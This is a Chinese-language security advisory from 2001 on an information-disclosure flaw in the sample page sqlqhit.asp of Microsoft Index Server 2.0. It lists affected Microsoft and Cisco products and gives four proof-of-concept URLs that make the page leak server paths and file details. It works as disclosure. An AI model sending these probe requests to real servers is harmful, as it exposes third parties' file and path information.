|
|
Microsoft Index Server 2.0 文件信息和路径可泄露问题
发布时间:2001-09-17
更新时间:2001-09-17
严重程度:中
威胁程度:服务器信息泄露
错误类型:设计错误
利用方式:服务器模式
受影响系统Microsoft Index Server 2.0
+ Microsoft IIS 4.0
+ Microsoft Windows NT 4.0 Option Pack
- Microsoft Windows NT 4.0SP7
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP6a
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP6
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP5
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP4
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP3
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP2
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP1
+ Microsoft Windows NT 4.0
+ Microsoft Windows NT 4.0
+ Microsoft BackOffice 4.5
- Microsoft Windows NT 4.0
+ Microsoft BackOffice 4.0
- Microsoft Windows NT 4.0
+ Cisco uOne 4.0
+ Cisco uOne 3.0
+ Cisco uOne 2.0
+ Cisco uOne 1.0
+ Cisco Unity Server 2.4
+ Cisco Unity Server 2.3
+ Cisco Unity Server 2.2
+ Cisco Unity Server 2.0
+ Cisco IP/VC 3540
+ Cisco ICS 7750
+ Cisco Call Manger 3.0
+ Cisco Call Manger 2.0
+ Cisco Call Manger 1.0
+ Cisco Building Broadband Service Manager 5.0 详细描述
sqlqhit.asp是执行基于WEB SQL查询的样本文件,恶意用户可以发送特殊构造的HTTP请求给IIS的INDEX SERVER而造成服务器路径信息,文件属性,或者某些文件的内容信息泄露。
测试代码
默认情况下sqlqhit.asp文件存在如下目录:\inetpub\iissamples\ISSamples\
http://local-iis-server/iissamples/ISSamples/SQLQHit.asp?CiColumns=*&CiScope=webinfo
http://local-iis-server/iissamples/ISSamples/SQLQHit.asp?CiColumns=*&CiScope=extended_fileinfo
http://local-iis-server/iissamples/ISSamples/SQLQHit.asp?CiColumns=*&CiScope=extended_webinfo
http://local-iis-server/iissamples/ISSamples/SQLQHit.asp?CiColumns=*&CiScope=fileinfo
解决方案
尚无
相关信息
|
